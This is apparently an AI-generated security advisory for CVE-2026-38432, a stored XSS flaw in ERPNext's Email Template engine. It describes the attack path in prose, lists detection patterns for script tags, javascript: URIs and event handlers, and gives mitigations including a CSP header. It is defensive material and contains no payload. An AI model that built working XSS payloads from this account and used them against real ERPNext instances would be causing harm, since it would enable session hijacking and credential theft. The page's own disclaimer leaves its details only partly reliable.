CVE-2026-38432 Overview
CVE-2026-38432 is a stored Cross-Site Scripting (XSS) vulnerability affecting ERPNext v15.103.1 and earlier versions. The flaw resides in the Email Template engine, where input is not properly sanitized before rendering. An authenticated attacker with permission to create or edit email templates can inject malicious JavaScript. The injected payload executes in the victim's browser when the template is applied. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation).
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in the browser of any user who applies a poisoned email template, enabling session hijacking, credential theft, and unauthorized actions within ERPNext.
Affected Products
- ERPNext v15.103.1
- ERPNext versions prior to v15.103.1
- Frappe Email Template engine integrated with ERPNext
Discovery Timeline
- 2026-05-05 - CVE-2026-38432 published to NVD
- 2026-05-07 - Last updated in NVD database
Technical Details for CVE-2026-38432
Vulnerability Analysis
The vulnerability exists within the ERPNext Email Template engine, a feature that allows administrators and privileged users to define reusable HTML email bodies with dynamic placeholders. The template engine fails to neutralize JavaScript content embedded inside template fields before rendering them in the application's web interface.
When a user applies a malicious template, the rendering context evaluates the embedded <script> tags or HTML event handlers. The payload runs with the privileges of the victim's session within the ERPNext application. This stored XSS pattern persists across sessions because the malicious content is saved server-side as part of the template record.
The attack requires authenticated access with permission to create or edit email templates. User interaction is required, since the payload only fires when a victim selects or previews the template. The scope changes because the script executes outside the original security boundary of the stored data.
Root Cause
The root cause is missing or insufficient output encoding when rendering user-controlled email template fields. The application trusts template authors to supply safe HTML, but does not enforce a sanitizer policy or strict Content Security Policy (CSP) on rendered content.
Attack Vector
An attacker first obtains an account with email template management privileges. The attacker then creates or modifies a template containing JavaScript inside HTML attributes or script blocks. When another ERPNext user, including higher-privileged administrators, applies the template, the script executes in their browser context. Refer to the public technical write-up for proof-of-concept details.
Detection Methods for CVE-2026-38432
Indicators of Compromise
- Email Template records containing <script> tags, javascript: URIs, or HTML event handlers such as onerror, onload, or onclick.
- Audit log entries showing template creation or modification by accounts that do not normally manage communications.
- Browser console errors or unexpected outbound network requests originating from the ERPNext UI when previewing or sending templated emails.
Detection Strategies
- Query the tabEmail Template table for fields containing suspicious HTML patterns and review any matches against expected template content.
- Inspect web server access logs for POST and PUT requests to /api/method/frappe.client.set_value and /api/resource/Email Template originating from low-trust accounts.
- Correlate template edits with subsequent authenticated session anomalies, such as new API key generation or user permission changes.
Monitoring Recommendations
- Enable Frappe activity logging for the Email Template doctype and forward events to a centralized log platform for retention and review.
- Alert on any modification to email templates outside scheduled change windows or by non-administrative roles.
- Monitor browser-side telemetry, such as CSP violation reports, to surface inline script execution attempts.
How to Mitigate CVE-2026-38432
Immediate Actions Required
- Upgrade ERPNext to a version newer than v15.103.1 once the vendor publishes a fixed release that addresses the Email Template sanitization issue.
- Restrict the Email Template Manager and equivalent roles to a small set of trusted administrators until patching is complete.
- Audit existing email templates and remove any entries containing inline scripts, event handlers, or javascript: URIs.
Patch Information
No specific patched version is listed in the NVD record at the time of publication. Administrators should track the ERPNext GitHub repository and the Frappe security advisories for fix announcements and apply updates promptly when released.
Workarounds
- Apply a strict Content Security Policy that disallows inline scripts (script-src 'self') at the reverse proxy or application layer to neutralize injected payloads.
- Reduce the number of users assigned roles with email template create or edit permissions to limit the attack surface.
- Implement a manual review workflow that requires a second administrator to approve any new or modified email template before it can be applied.
# Example: enforce CSP via Nginx in front of ERPNext
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'" always;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
